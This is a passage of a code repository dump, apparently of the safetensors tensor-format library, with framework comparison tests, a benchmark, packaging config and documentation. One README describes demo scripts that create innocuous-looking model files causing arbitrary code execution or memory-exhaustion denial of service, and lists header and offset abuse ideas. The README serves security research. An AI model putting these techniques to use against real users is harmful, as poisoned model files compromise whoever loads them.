54 | s3 = s3fs.S3FileSystem(anon=True) 55 | byts = save(tensors) 56 | print(s3.ls("my-bucket")) 57 | with s3.open("out/fs.safetensors", "wb") as f: 58 | f.write(byts) 59 | # Now loading 60 | loaded = {} 61 | with s3.open("out/fs.safetensors", "rb") as f: 62 | with _safe_open_handle(f, framework="np", device="cpu") as g: 63 | for key in g.keys(): 64 | loaded[key] = g.get_tensor(key) 65 | self.assertTensorEqual(tensors, loaded, np.allclose) 66 | -------------------------------------------------------------------------------- /bindings/python/tests/test_mlx_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | 4 | 5 | HAS_MLX = False 6 | if platform.system() == "Darwin": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | try: 10 | import mlx.core as mx 11 | 12 | HAS_MLX = True 13 | except ImportError: 14 | pass 15 | if HAS_MLX: 16 | from safetensors import safe_open 17 | from safetensors.mlx import load_file, save_file 18 | 19 | 20 | # MLX only exists on Mac 21 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac") 22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.") 23 | class LoadTestCase(unittest.TestCase): 24 | def setUp(self): 25 | data = { 26 | "test": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 27 | "test2": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 28 | "test3": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 29 | "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32).astype( 30 | mx.complex64 31 | ), 32 | # This doesn't work because bfloat16 is not implemented 33 | # with similar workarounds as jax/tensorflow. 34 | # https://github.com/ml-explore/mlx/issues/1296 35 | # "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.bfloat16), 36 | } 37 | self.mlx_filename = "./tests/data/mlx_load.npz" 38 | self.sf_filename = "./tests/data/mlx_load.safetensors" 39 | 40 | mx.savez(self.mlx_filename, **data) 41 | save_file(data, self.sf_filename) 42 | 43 | def test_zero_sized(self): 44 | data = { 45 | "test": mx.zeros((2, 0), dtype=mx.float32), 46 | } 47 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 48 | save_file(data.copy(), local) 49 | reloaded = load_file(local) 50 | # Empty tensor != empty tensor on numpy, so comparing shapes 51 | # instead 52 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 53 | 54 | def test_deserialization_safe(self): 55 | weights = load_file(self.sf_filename) 56 | 57 | mlx_weights = mx.load(self.mlx_filename) 58 | 59 | for k, v in weights.items(): 60 | tv = mlx_weights[k] 61 | self.assertTrue(mx.allclose(v, tv)) 62 | 63 | def test_deserialization_safe_open(self): 64 | weights = {} 65 | with safe_open(self.sf_filename, framework="mlx") as f: 66 | for k in f.keys(): 67 | weights[k] = f.get_tensor(k) 68 | 69 | mlx_weights = mx.load(self.mlx_filename) 70 | 71 | for k, v in weights.items(): 72 | tv = mlx_weights[k] 73 | self.assertTrue(mx.allclose(v, tv)) 74 | -------------------------------------------------------------------------------- /bindings/python/benches/test_tf.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import h5py 5 | import numpy as np 6 | import tensorflow as tf 7 | 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(filename, tensors=None, prefix=""): 12 | with h5py.File(filename, "r") as f: 13 | if tensors is None: 14 | tensors = {} 15 | for k in f.keys(): 16 | if isinstance(f[k], h5py._hl.dataset.Dataset): 17 | key = k if not prefix else f"{prefix}_{k}" 18 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 19 | else: 20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 21 | return tensors 22 | 23 | 24 | def _save(filename, tensors, prefix=""): 25 | with h5py.File(filename, "w") as f: 26 | for name, tensor in tensors.items(): 27 | tensor = tensor.numpy() 28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 29 | dset[:] = tensor 30 | 31 | 32 | def create_gpt2(n_layers: int): 33 | tensors = {} 34 | tensors["wte"] = tf.zeros((50257, 768)) 35 | tensors["wpe"] = tf.zeros((1024, 768)) 36 | for i in range(n_layers): 37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) 38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) 39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) 40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) 41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) 42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) 43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) 44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) 45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) 46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) 47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) 48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) 49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) 50 | tensors["ln_f.weight"] = tf.zeros((768)) 51 | tensors["ln_f.bias"] = tf.zeros((768)) 52 | return tensors 53 | 54 | 55 | def test_tf_tf_load(benchmark): 56 | # benchmark something 57 | weights = create_gpt2(12) 58 | with tempfile.NamedTemporaryFile(delete=False) as f: 59 | _save(f.name, weights) 60 | result = benchmark(_load, f.name) 61 | os.unlink(f.name) 62 | 63 | for k, v in weights.items(): 64 | tv = result[k] 65 | assert np.allclose(v, tv) 66 | 67 | 68 | def test_tf_sf_load(benchmark): 69 | # benchmark something 70 | weights = create_gpt2(12) 71 | with tempfile.NamedTemporaryFile(delete=False) as f: 72 | save_file(weights, f.name) 73 | result = benchmark(load_file, f.name) 74 | os.unlink(f.name) 75 | 76 | for k, v in weights.items(): 77 | tv = result[k] 78 | assert np.allclose(v, tv) 79 | -------------------------------------------------------------------------------- /bindings/python/tests/test_flax_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | import sys 4 | 5 | 6 | if platform.system() != "Windows": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | import jax.numpy as jnp 10 | from jax import random 11 | from flax.serialization import msgpack_restore, msgpack_serialize 12 | from safetensors import safe_open 13 | from safetensors.flax import load_file, save_file 14 | 15 | 16 | # Jax doesn't not exist on Windows 17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows") 18 | class LoadTestCase(unittest.TestCase): 19 | def setUp(self): 20 | key = random.key(0) 21 | data = { 22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32), 23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16), 24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16), 25 | "test4": random.normal(key, (1024, 1024), dtype=jnp.complex64), 26 | } 27 | self.flax_filename = "./tests/data/flax_load.msgpack" 28 | self.sf_filename = "./tests/data/flax_load.safetensors" 29 | 30 | serialized = msgpack_serialize(data) 31 | with open(self.flax_filename, "wb") as f: 32 | f.write(serialized) 33 | 34 | save_file(data, self.sf_filename) 35 | 36 | def test_zero_sized(self): 37 | data = { 38 | "test": jnp.zeros((2, 0), dtype=jnp.float32), 39 | } 40 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 41 | save_file(data.copy(), local) 42 | reloaded = load_file(local) 43 | # Empty tensor != empty tensor on numpy, so comparing shapes 44 | # instead 45 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 46 | 47 | def test_deserialization_safe(self): 48 | weights = load_file(self.sf_filename) 49 | 50 | with open(self.flax_filename, "rb") as f: 51 | data = f.read() 52 | flax_weights = msgpack_restore(data) 53 | 54 | for k, v in weights.items(): 55 | tv = flax_weights[k] 56 | self.assertTrue(jnp.allclose(v, tv)) 57 | 58 | def test_deserialization_safe_open(self): 59 | weights = {} 60 | with safe_open(self.sf_filename, framework="flax") as f: 61 | for k in f.keys(): 62 | weights[k] = f.get_tensor(k) 63 | 64 | with open(self.flax_filename, "rb") as f: 65 | data = f.read() 66 | flax_weights = msgpack_restore(data) 67 | 68 | for k, v in weights.items(): 69 | tv = flax_weights[k] 70 | self.assertTrue(jnp.allclose(v, tv)) 71 | 72 | def test_loading_without_ml_dtype(self): 73 | # This does not work as we cannot unload 74 | # modules, copy this into its own file to test. 75 | # https://github.com/huggingface/safetensors/issues/598 76 | sys.modules.pop("ml_dtypes", None) 77 | with safe_open(self.sf_filename, framework="flax") as f: 78 | f.get_tensor("test3") 79 | -------------------------------------------------------------------------------- /bindings/python/pyproject.toml: -------------------------------------------------------------------------------- 1 | [project] 2 | name = 'safetensors' 3 | requires-python = '>=3.9' 4 | authors = [ 5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} 6 | ] 7 | classifiers = [ 8 | "Development Status :: 5 - Production/Stable", 9 | "Intended Audience :: Developers", 10 | "Intended Audience :: Education", 11 | "Intended Audience :: Science/Research", 12 | "License :: OSI Approved :: Apache Software License", 13 | "Operating System :: OS Independent", 14 | "Programming Language :: Python :: 3", 15 | "Programming Language :: Python :: 3.7", 16 | "Programming Language :: Python :: 3.8", 17 | "Programming Language :: Python :: 3.9", 18 | "Programming Language :: Python :: 3.10", 19 | "Topic :: Scientific/Engineering :: Artificial Intelligence", 20 | "Typing :: Typed", 21 | ] 22 | license = { file = "LICENSE" } 23 | dynamic = [ 24 | 'description', 25 | 'readme', 26 | 'version', 27 | ] 28 | 29 | [project.urls] 30 | Homepage = 'https://github.com/huggingface/safetensors' 31 | Source = 'https://github.com/huggingface/safetensors' 32 | 33 | [project.optional-dependencies] 34 | numpy = ["numpy>=1.21.6"] 35 | torch = [ 36 | "packaging", 37 | "safetensors[numpy]", 38 | "torch>=1.10", 39 | ] 40 | tensorflow = [ 41 | "safetensors[numpy]", 42 | "tensorflow>=2.11.0", 43 | ] 44 | # pinning tf version 2.11.0 for doc-builder 45 | pinned-tf = [ 46 | "safetensors[numpy]", 47 | "tensorflow==2.18.0", 48 | ] 49 | jax = [ 50 | "safetensors[numpy]", 51 | "flax>=0.6.3", 52 | "jax>=0.3.25", 53 | "jaxlib>=0.3.25", 54 | ] 55 | mlx = [ 56 | "mlx>=0.0.9", 57 | ] 58 | paddlepaddle = [ 59 | "safetensors[numpy]", 60 | "paddlepaddle>=2.4.1", 61 | ] 62 | quality = [ 63 | "ruff", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 64 | ] 65 | testing = [ 66 | "safetensors[numpy]", 67 | "h5py>=3.7.0", 68 | "huggingface_hub>=0.12.1", 69 | "setuptools_rust>=1.5.2", 70 | "pytest>=7.2.0", 71 | "pytest-benchmark>=4.0.0", 72 | # "python-afl>=0.7.3", 73 | "hypothesis>=6.70.2", 74 | ] 75 | testingfree = [ 76 | "safetensors[numpy]", 77 | "huggingface_hub>=0.12.1", 78 | "setuptools_rust>=1.5.2", 79 | "pytest>=7.2.0", 80 | "pytest-benchmark>=4.0.0", 81 | # "python-afl>=0.7.3", 82 | "hypothesis>=6.70.2", 83 | ] 84 | all = [ 85 | "safetensors[torch]", 86 | "safetensors[numpy]", 87 | "safetensors[pinned-tf]", 88 | "safetensors[jax]", 89 | "safetensors[paddlepaddle]", 90 | "safetensors[quality]", 91 | "safetensors[testing]", 92 | ] 93 | dev = [ 94 | "safetensors[all]", 95 | ] 96 | 97 | 98 | [build-system] 99 | requires = ["maturin>=1.0,<2.0"] 100 | build-backend = "maturin" 101 | 102 | [tool.maturin] 103 | python-source = "py_src" 104 | module-name = "safetensors._safetensors_rust" 105 | bindings = 'pyo3' 106 | features = ["pyo3/extension-module"] 107 | 108 | [tool.black] 109 | line-length = 119 110 | target-version = ['py35'] 111 | 112 | [tool.setuptools.dynamic] 113 | readme = {file = ["README.rst"]} 114 | -------------------------------------------------------------------------------- /attacks/README.md: -------------------------------------------------------------------------------- 1 | The purpose of this directory is to showcase various attacks (and creating your own). 2 | 3 | 4 | # Torch Arbitrary code execution 5 | 6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file. 7 | ``` 8 | python torch_ace_create.py 9 | python torch_ace_get_pwned.py 10 | ``` 11 | 12 | # PaddlePaddle Arbitrary code execution 13 | 14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file. 15 | ``` 16 | python paddle_ace_create.py 17 | python paddle_ace_get_pwned.py 18 | ``` 19 | 20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`) 21 | 22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file. 23 | ``` 24 | python tf_dos_create.py 25 | python tf_dos_get_pwned.py 26 | ``` 27 | 28 | # Torch Denial of Service (OOM kills the running process) 29 | 30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file. 31 | ``` 32 | python torch_dos_create.py 33 | python torch_dos_get_pwned.py 34 | ``` 35 | 36 | # Numpy Denial of Service (OOM kills the running process) 37 | 38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file. 39 | ``` 40 | python numpy_dos_create.py 41 | python numpy_dos_get_pwned.py 42 | ``` 43 | 44 | # Safetensors abuse attempts 45 | 46 | In order to try and check the limits, we also try to abuse the current format. 47 | Please send ideas! 48 | 49 | A few things can be abused: 50 | - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1). 51 | - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least 52 | it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse). 53 | Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2) 54 | - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default. 55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok. 56 | While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small 57 | file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact 58 | that the offsets must be contiguous and non overlapping. 59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against. 60 | - Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned). 61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary. 62 | 63 | ``` 64 | python safetensors_abuse_attempt_1.py 65 | python safetensors_abuse_attempt_2.py 66 | python safetensors_abuse_attempt_3.py 67 | ``` 68 | -------------------------------------------------------------------------------- /bindings/python/tests/test_tf_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import h5py 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import safe_open 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(f, tensors=None, prefix=""): 12 | if tensors is None: 13 | tensors = {} 14 | for k in f.keys(): 15 | if isinstance(f[k], h5py._hl.dataset.Dataset): 16 | key = k if not prefix else f"{prefix}_{k}" 17 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 18 | else: 19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 20 | return tensors 21 | 22 | 23 | def _save(f, tensors, prefix=""): 24 | for name, tensor in tensors.items(): 25 | tensor = tensor.numpy() 26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 27 | dset[:] = tensor 28 | 29 | 30 | class SafeTestCase(unittest.TestCase): 31 | def setUp(self): 32 | data = { 33 | "test": tf.zeros((1024, 1024), dtype=tf.float32), 34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32), 35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32), 36 | "test4": tf.zeros((1024, 1024), dtype=tf.complex64), 37 | } 38 | self.tf_filename = "./tests/data/tf_load.h5" 39 | self.sf_filename = "./tests/data/tf_load.safetensors" 40 | 41 | with h5py.File(self.tf_filename, "w") as f: 42 | _save(f, data) 43 | save_file(data, self.sf_filename) 44 | 45 | def test_zero_sized(self): 46 | data = { 47 | "test": tf.zeros((2, 0), dtype=tf.float32), 48 | } 49 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 50 | save_file(data.copy(), local) 51 | reloaded = load_file(local) 52 | # Empty tensor != empty tensor on numpy, so comparing shapes 53 | # instead 54 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 55 | 56 | def test_deserialization_safe(self): 57 | weights = load_file(self.sf_filename) 58 | 59 | with h5py.File(self.tf_filename, "r") as f: 60 | tf_weights = _load(f) 61 | 62 | for k, v in weights.items(): 63 | tv = tf_weights[k] 64 | self.assertTrue(np.allclose(v, tv)) 65 | 66 | def test_bfloat16(self): 67 | data = { 68 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), 69 | } 70 | save_file(data, self.sf_filename) 71 | weights = {} 72 | with safe_open(self.sf_filename, framework="tf") as f: 73 | for k in f.keys(): 74 | weights[k] = f.get_tensor(k) 75 | 76 | for k, v in weights.items(): 77 | tv = data[k] 78 | self.assertTrue(tf.experimental.numpy.allclose(v, tv)) 79 | 80 | def test_deserialization_safe_open(self): 81 | weights = {} 82 | with safe_open(self.sf_filename, framework="tf") as f: 83 | for k in f.keys(): 84 | weights[k] = f.get_tensor(k) 85 | 86 | with h5py.File(self.tf_filename, "r") as f: 87 | tf_weights = _load(f) 88 | 89 | for k, v in weights.items(): 90 | tv = tf_weights[k] 91 | self.assertTrue(np.allclose(v, tv)) 92 | -------------------------------------------------------------------------------- /docs/source/speed.mdx: -------------------------------------------------------------------------------- 1 | # Speed Comparison 2 | 3 | 4 | Open In Colab 9 | 10 | 11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab. 12 | 13 | Before you begin, make sure you have all the necessary libraries installed: 14 | 15 | ```bash 16 | pip install safetensors huggingface_hub torch 17 | ``` 18 | 19 | Let's start by importing all the packages that will be used: 20 | 21 | ```py 22 | >>> import os 23 | >>> import datetime 24 | >>> from huggingface_hub import hf_hub_download 25 | >>> from safetensors.torch import load_file 26 | >>> import torch 27 | ``` 28 | 29 | Download safetensors & torch weights for gpt2: 30 | 31 | ```py 32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors") 33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin") 34 | ``` 35 | 36 | ### CPU benchmark 37 | 38 | ```py 39 | >>> start_st = datetime.datetime.now() 40 | >>> weights = load_file(sf_filename, device="cpu") 41 | >>> load_time_st = datetime.datetime.now() - start_st 42 | >>> print(f"Loaded safetensors {load_time_st}") 43 | 44 | >>> start_pt = datetime.datetime.now() 45 | >>> weights = torch.load(pt_filename, map_location="cpu") 46 | >>> load_time_pt = datetime.datetime.now() - start_pt 47 | >>> print(f"Loaded pytorch {load_time_pt}") 48 | 49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 50 | Loaded safetensors 0:00:00.004015 51 | Loaded pytorch 0:00:00.307460 52 | on CPU, safetensors is faster than pytorch by: 76.6 X 53 | ``` 54 | 55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282). 56 | The currently shown speedup was gotten on: 57 | * OS: Ubuntu 18.04.6 LTS 58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz 59 | 60 | 61 | ### GPU benchmark 62 | 63 | ```py 64 | >>> # This is required because this feature hasn't been fully verified yet, but 65 | >>> # it's been tested on many different environments 66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1" 67 | 68 | >>> # CUDA startup out of the measurement 69 | >>> torch.zeros((2, 2)).cuda() 70 | 71 | >>> start_st = datetime.datetime.now() 72 | >>> weights = load_file(sf_filename, device="cuda:0") 73 | >>> load_time_st = datetime.datetime.now() - start_st 74 | >>> print(f"Loaded safetensors {load_time_st}") 75 | 76 | >>> start_pt = datetime.datetime.now() 77 | >>> weights = torch.load(pt_filename, map_location="cuda:0") 78 | >>> load_time_pt = datetime.datetime.now() - start_pt 79 | >>> print(f"Loaded pytorch {load_time_pt}") 80 | 81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 82 | Loaded safetensors 0:00:00.165206 83 | Loaded pytorch 0:00:00.353889 84 | on GPU, safetensors is faster than pytorch by: 2.1 X 85 | ``` 86 | 87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU. 88 | The currently shown speedup was gotten on: 89 | * OS: Ubuntu 18.04.6 LTS. 90 | * GPU: Tesla T4 91 | * Driver Version: 460.32.03 92 | * CUDA Version: 11.2 93 | -------------------------------------------------------------------------------- /docs/source/index.mdx: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 |
7 | 8 | # Safetensors 9 | 10 | Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed). 11 | 12 | ## Installation 13 | 14 | with pip: 15 | ``` 16 | pip install safetensors 17 | ``` 18 | 19 | with conda: 20 | ``` 21 | conda install -c huggingface safetensors 22 | ``` 23 | 24 | ## Usage 25 | 26 | ### Load tensors 27 | 28 | ```python 29 | from safetensors import safe_open 30 | 31 | tensors = {} 32 | with safe_open("model.safetensors", framework="pt", device=0) as f: 33 | for k in f.keys(): 34 | tensors[k] = f.get_tensor(k) 35 | ``` 36 | 37 | Loading only part of the tensors (interesting when running on multiple GPU) 38 | 39 | ```python 40 | from safetensors import safe_open 41 | 42 | tensors = {} 43 | with safe_open("model.safetensors", framework="pt", device=0) as f: 44 | tensor_slice = f.get_slice("embedding") 45 | vocab_size, hidden_dim = tensor_slice.get_shape() 46 | tensor = tensor_slice[:, :hidden_dim] 47 | ``` 48 | 49 | ### Save tensors 50 | 51 | ```python 52 | import torch 53 | from safetensors.torch import save_file 54 | 55 | tensors = { 56 | "embedding": torch.zeros((2, 2)), 57 | "attention": torch.zeros((2, 3)) 58 | } 59 | save_file(tensors, "model.safetensors") 60 | ``` 61 | 62 | ## Format 63 | 64 | Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format: 65 | 66 |
67 | 68 |
69 | 70 | ## Featured Projects 71 | 72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors: 73 | 74 | * [huggingface/transformers](https://github.com/huggingface/transformers) 75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx) 76 | * [huggingface/candle](https://github.com/huggingface/candle) 77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) 78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537) 79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix) 80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI) 81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models) 82 | * [CivitAI](https://civitai.com/) 83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers) 84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx) 85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI) 86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui) 87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner) 88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP) 89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT) 90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry) 91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI) 92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE) 93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax) 94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic) 95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures) 96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors) 97 | -------------------------------------------------------------------------------- /bindings/python/tests/test_threadable.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | from concurrent import futures 3 | import threading 4 | import numpy as np 5 | from safetensors import serialize_file 6 | from safetensors.numpy import load_file 7 | import time 8 | import os 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def test_serialize_file_releases_gil(self): 13 | """Test that serialize_file releases the GIL and can run concurrently.""" 14 | # Create large numpy arrays to ensure serialization takes measurable time 15 | # Keep them alive throughout the test since we pass raw pointers 16 | tensor_a = np.random.randn(2000, 20000).astype(np.float32) 17 | tensor_b = np.random.randint(0, 128, (20000, 2000), dtype=np.int8) 18 | 19 | # Build the tensor dict with data pointers (as serialize_file expects) 20 | tensor_data = { 21 | "tensor_a": { 22 | "dtype": tensor_a.dtype.name, 23 | "shape": tensor_a.shape, 24 | "data_ptr": tensor_a.ctypes.data, 25 | "data_len": tensor_a.nbytes, 26 | }, 27 | "tensor_b": { 28 | "dtype": tensor_b.dtype.name, 29 | "shape": tensor_b.shape, 30 | "data_ptr": tensor_b.ctypes.data, 31 | "data_len": tensor_b.nbytes, 32 | }, 33 | } 34 | 35 | num_threads = 4 36 | results = {} 37 | barrier = threading.Barrier(num_threads) 38 | file_names = [f"tmp_thread_{i}.safetensors" for i in range(num_threads)] 39 | 40 | def saving_thread(thread_id): 41 | file_name = file_names[thread_id] 42 | # Wait for all threads to be ready 43 | barrier.wait() 44 | start_time = time.monotonic() 45 | serialize_file(tensor_data, file_name) 46 | end_time = time.monotonic() 47 | results[thread_id] = (start_time, end_time) 48 | 49 | try: 50 | # Run multiple serialize_file calls concurrently 51 | with futures.ThreadPoolExecutor(max_workers=num_threads) as executor: 52 | futs = [executor.submit(saving_thread, i) for i in range(num_threads)] 53 | for f in futs: 54 | f.result() # Raise any exceptions 55 | 56 | # Verify all threads completed 57 | self.assertEqual(len(results), num_threads) 58 | 59 | # Check that the threads actually ran concurrently by verifying 60 | # their execution windows overlap. If the GIL was held, threads 61 | # would run sequentially with no overlap. 62 | all_starts = [r[0] for r in results.values()] 63 | all_ends = [r[1] for r in results.values()] 64 | 65 | # The latest start should be before the earliest end if threads overlapped 66 | latest_start = max(all_starts) 67 | earliest_end = min(all_ends) 68 | 69 | # If GIL is released, threads run in parallel so latest_start < earliest_end 70 | # If GIL is NOT released, threads run sequentially so latest_start >= earliest_end 71 | self.assertLess( 72 | latest_start, 73 | earliest_end, 74 | f"Threads did not run concurrently - GIL may not be released. " 75 | f"Latest start: {latest_start}, Earliest end: {earliest_end}", 76 | ) 77 | 78 | # Verify all output files are valid and contain correct data 79 | for file_name in file_names: 80 | loaded = load_file(file_name) 81 | np.testing.assert_array_equal( 82 | loaded["tensor_a"], 83 | tensor_a, 84 | err_msg=f"tensor_a mismatch in {file_name}", 85 | ) 86 | np.testing.assert_array_equal( 87 | loaded["tensor_b"], 88 | tensor_b, 89 | err_msg=f"tensor_b mismatch in {file_name}", 90 | ) 91 | finally: 92 | # Clean up all temporary files 93 | for file_name in file_names: 94 | if os.path.exists(file_name): 95 | os.remove(file_name) 96 | 97 | 98 | if __name__ == "__main__": 99 | unittest.main() 100 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import jax.numpy as jnp 7 | from jax import Array 8 | from safetensors import numpy, safe_open 9 | 10 | 11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes: 12 | """ 13 | Saves a dictionary of tensors into raw bytes in safetensors format. 14 | 15 | Args: 16 | tensors (`Dict[str, Array]`): 17 | The incoming tensors. Tensors need to be contiguous and dense. 18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 19 | Optional text only metadata you might want to save in your header. 20 | For instance it can be useful to specify more about the underlying 21 | tensors. This is purely informative and does not affect tensor loading. 22 | 23 | Returns: 24 | `bytes`: The raw bytes representing the format 25 | 26 | Example: 27 | 28 | ```python 29 | from safetensors.flax import save 30 | from jax import numpy as jnp 31 | 32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 33 | byte_data = save(tensors) 34 | ``` 35 | """ 36 | np_tensors = _jnp2np(tensors) 37 | return numpy.save(np_tensors, metadata=metadata) 38 | 39 | 40 | def save_file( 41 | tensors: Dict[str, Array], 42 | filename: Union[str, os.PathLike], 43 | metadata: Optional[Dict[str, str]] = None, 44 | ) -> None: 45 | """ 46 | Saves a dictionary of tensors into raw bytes in safetensors format. 47 | 48 | Args: 49 | tensors (`Dict[str, Array]`): 50 | The incoming tensors. Tensors need to be contiguous and dense. 51 | filename (`str`, or `os.PathLike`)): 52 | The filename we're saving into. 53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 54 | Optional text only metadata you might want to save in your header. 55 | For instance it can be useful to specify more about the underlying 56 | tensors. This is purely informative and does not affect tensor loading. 57 | 58 